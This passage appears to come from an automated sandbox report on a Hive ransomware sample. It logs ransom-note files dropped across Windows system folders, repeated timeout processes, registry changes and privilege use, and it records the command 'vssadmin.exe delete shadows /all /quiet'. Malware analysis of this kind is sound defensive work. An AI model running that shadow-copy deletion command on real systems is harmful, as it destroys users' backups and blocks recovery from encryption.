| File created | C:\Windows\assembly\GAC_MSIL\System.ServiceModel.Resources\3.0.0.0_it_b77a5c561934e089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-commandline-tool_31bf3856ad364e35_10.0.19041.928_none_0b17415ae0dd0379\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-i..o4-codecs.resources_31bf3856ad364e35_10.0.19041.1_en-us_57d193173da3f87b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-onecore-c..clientapi.resources_31bf3856ad364e35_10.0.19041.1_de-de_9b306a53cd56cfa2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-devices-wifidirect_31bf3856ad364e35_10.0.19041.264_none_7507f2201fb551a4\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\msil_system.serviceprocess.resources_b03f5f7f11d50a3a_10.0.19041.1_it-it_ae68d65583e97eab\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\msil_microsoft.powershell.security.resources_31bf3856ad364e35_1.0.0.0_ja-jp_81063264f1136d5e\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_windows-media-speech-winrt_31bf3856ad364e35_10.0.19041.264_none_fbb15bbadd313556\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..roxy-main.resources_31bf3856ad364e35_10.0.19041.1_en-us_3813956db567ed0e\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-omadmclient_31bf3856ad364e35_10.0.19041.1151_none_c86feb6936a97173\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig.resources\v4.0_4.0.0.0_es_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-n..pprovider.resources_31bf3856ad364e35_10.0.19041.1_es-es_41e0d1946a7c5321\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\msil_system.messaging.resources_b03f5f7f11d50a3a_10.0.19041.1_de-de_917d3b2b93fb8e53\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities.Resources\2.0.0.0_ja_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-payments_31bf3856ad364e35_10.0.19041.746_none_3c6d03c57404e0f9\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-directui.resources_31bf3856ad364e35_10.0.19041.1023_pt-br_e4a05bc207bb3d6f\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-mediaplayer-wmvcore_31bf3856ad364e35_10.0.19041.1202_none_1fd41533d2b067a4\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..2provider.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_02970791e1e5a4d5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..airingdll.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_a49ef473cdccb95c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..dac-rds-persist-dll_31bf3856ad364e35_10.0.19041.1_none_4a9e393bc6b3251b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-ie-f12app_31bf3856ad364e35_11.0.19041.746_none_3439cbf8eff84ce1\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_dual_input.inf_31bf3856ad364e35_10.0.19041.868_none_06aed3f048cb8494\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-devicepropertymanager_31bf3856ad364e35_10.0.19041.746_none_9ae154761e6a5add\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration.resources\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-powercpl_31bf3856ad364e35_10.0.19041.423_none_3fecd70fd2fa0d37\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-wmi-filter.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_1b28da3746b5dd0d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-r..systemmanufacturers_31bf3856ad364e35_10.0.19041.746_none_4d8cd7989326ef85\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.19041.264_none_31474dbf12ce5adc\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-api_31bf3856ad364e35_10.0.19041.1266_none_2b4b7ff44edc4a8b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\INF\BITS\0411\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\INF\Windows Workflow Foundation 3.0.0.0\0409\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands.Resources\v4.0_10.0.0.0_ja_31bf3856ad364e35\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-aero.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_92ba62f3ec5ae25c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-wpd-busenumservice_31bf3856ad364e35_10.0.19041.1_none_2def3dd96b5fea95\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration.resources\v4.0_4.0.0.0_it_b77a5c561934e089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..lity-eoaexperiences_31bf3856ad364e35_10.0.19041.153_none_c283d2cf01b0b7d8\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-kernelbase_31bf3856ad364e35_10.0.19041.1288_none_a61ec92f9e248eae\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-wmpnss-publicapi_31bf3856ad364e35_10.0.19041.746_none_69467668c56fda1a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.19041.789_none_3136b8d712da0334\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..nter-core.resources_31bf3856ad364e35_10.0.19041.1_it-it_bb104a70cd466cf6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..ransformers-onecore_31bf3856ad364e35_10.0.19041.262_none_023656085a635caf\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..-inputdll.resources_31bf3856ad364e35_10.0.19041.1_es-es_34064879a57dffb3\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..k-softkbd.resources_31bf3856ad364e35_10.0.19041.1_de-de_308c961abd2def42\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-flacencoder_31bf3856ad364e35_10.0.19041.746_none_fcdcc022ec231bfa\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.WindowsRuntime\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-driverquery.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_5586251554a4ddb1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-u..dem-voice.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_50c12c5e7b6751b7\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2539840389-1261165778-1087677076-1000\{3DE2B3E7-739B-41F5-8C14-BBC5AECCDC21} | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\MuiCache | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
